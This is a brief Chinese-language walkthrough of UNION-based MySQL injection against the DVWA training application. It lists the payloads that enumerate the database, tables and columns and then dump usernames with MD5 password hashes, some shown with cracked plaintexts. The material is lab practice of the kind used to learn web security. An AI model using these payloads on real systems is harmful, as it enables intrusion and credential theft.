mysql注入

通过 ' or 1=1 order by 3 #网页报错
数据库查询的返回结果只有两列

要查询这个网页使用的数据库的名字？
' union select 1,database() #

结果：dvwa

要查询“dvwa”这个数据库里面有多少张表，分别叫什么？
' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'dvwa' #

结果： guestbook,users

要查询"users"里面的字段有哪些？
' union select 1,group_concat(column_name) from information_schema.columns where table_name = 'users' #

结果：user_id,first_name,last_name,user,password,avatar,last_login,failed_login

 

找到了user password 这两个我们需要的字段，要获取相对应的账号和密码？
' union select user,password from users #

admin
5f4dcc3b5aa765d61d8327deb882cf99（password）

gordonb
e99a18c428cb38d5f260853678922e03（abc123）

1337
8d3533d75ae2c3966d7e0d4fcc69216b（charley）

pablo
0d107d09f5bbe40cade3de5c71e9e9b7

smithy
5f4dcc3b5aa765d61d8327deb882cf99